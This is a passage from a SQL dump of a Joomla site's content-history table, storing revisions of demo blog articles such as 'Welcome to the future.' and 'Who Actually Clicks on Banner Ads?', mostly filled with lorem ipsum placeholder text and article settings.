icle_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":9,\"ordering\":\"4\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"24\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(67,74,1,'','2016-02-28 11:11:59',692,3722,'627f5d09726a75d5bbd6b95b4528ed445221b092','{\"id\":74,\"asset_id\":\"198\",\"title\":\"The salesman is dead. Long live the salesman.\",\"alias\":\"the-salesman-is-dead-long-live-the-salesman\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-02.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:11:59\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:11:41\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-02.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"{\\\\\\\"gallery_images\\\\\\\":[\\\\\\\"images\\\\\\/blog\\\\\\/blog06.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog05.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog04.jpg\\\\\\\"]}\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":6,\"ordering\":\"5\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"38\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(68,74,1,'','2016-02-28 11:12:13',692,3727,'7ace963aa9001465f6676dbcab91158256da1440','{\"id\":74,\"asset_id\":\"198\",\"title\":\"The salesman is dead. Long live the salesman.\",\"alias\":\"the-salesman-is-dead-long-live-the-salesman\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-02.jpg\\\" alt=\\\"\\\" \\/>\\u00a0Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:12:13\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:12:04\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-02.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"{\\\\\\\"gallery_images\\\\\\\":[\\\\\\\"images\\\\\\/blog\\\\\\/blog06.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog05.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog04.jpg\\\\\\\"]}\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":7,\"ordering\":\"5\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"38\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(69,73,1,'','2016-02-28 11:12:42',692,3087,'6b8009c2e08051251a7c27abab899a593fe84665','{\"id\":73,\"asset_id\":\"197\",\"title\":\"Portable sales devices making a difference.\",\"alias\":\"portable-sales-devices-making-a-difference\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-06.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:12:42\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:12:27\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-06.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":7,\"ordering\":\"6\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"97\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(70,78,1,'','2016-02-28 11:15:37',692,3021,'d703f17435be28c23df6dd8de934567fd73be798','{\"id\":78,\"asset_id\":\"233\",\"title\":\"Welcome to the future.\",\"alias\":\"welcome-to-the-future\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-05.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:15:37\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:15:27\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":7,\"ordering\":\"1\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"5\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(71,77,1,'','2016-02-28 11:16:00',692,3950,'b07bff292485907501a06fe49bb367f7bf835ee9','{\"id\":77,\"asset_id\":\"201\",\"title\":\"Why we all need to be connected.\",\"alias\":\"why-we-all-need-to-be-connected\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-01.jpg\\\" alt=\\\"\\\" \\/> We\\u2019re in a period where the cutting edge of change has moved from the technology to the literacies made possible by the technology.<\\/p>\\r\\n<p>The future of digital culture \\u2013 yours, mine, and ours \\u2013 depends on how well we learn to use the media that have infiltrated, amplified, distracted, enriched, and complicated our lives. I believe that learning to live mindfully in cyber culture is as impor\\u00adtant to us as a civilization as it is vital to you and me as individuals. The mindful use of digital media doesn\\u2019t happen automatically.<\\/p>\\r\\n<p>Thinking about what you are doing and why you are doing it instead of going through the motions is fundamental to the defi\\u00adnition of mindful, whether you are de\\u00adciding to follow someone on Twitter, shutting the lid of your laptop in class, looking up from your BlackBerry in a meeting, or consciously deciding which links not to click. Although edu\\u00adcational institutions have been slow to incorporate digital literacies, practi\\u00adcal know-how is available to those who figure out how to find it. This know-how, from the art of growing social capital in virtual communities to the craft of cultivating wiki collaboration, might determine whether life online will drive us to distraction, or augment and broaden our minds.<\\/p>\\r\\n<p>Those who un\\u00adderstand the fundamentals of digital participation, online collaboration, in\\u00adformational credibility testing, and network awareness will be able to exert more control over their own fates than those who lack this lore.<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:16:00\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:15:45\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"Pork meatball ground round prosciutto. Sirloin bresaola ball tip shank tail porchetta pork boudin filet mignon flank jowl salami. Filet mignon bresaola pork boudin capicola prosciutto. Frankfurter chicken leberkas drumstick ball tip turducken rump spare ribs meatball. Tail salami pork loin ham. Drumstick flank porchetta, hamburger ham swine biltong chicken pancetta. Spare ribs prosciutto t-bone.\\\",\\\"quote_author\\\":\\\"- John Doe\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":7,\"ordering\":\"2\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"34\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(72,76,1,'','2016-02-28 11:16:04',692,4199,'11f355f47164862c8330793707befada3146f7c9','{\"id\":76,\"asset_id\":\"200\",\"title\":\"Who Actually Clicks on Banner Ads?\",\"alias\":\"who-actually-clicks-on-banner-ads\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-04.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:16:04\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:15:51\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\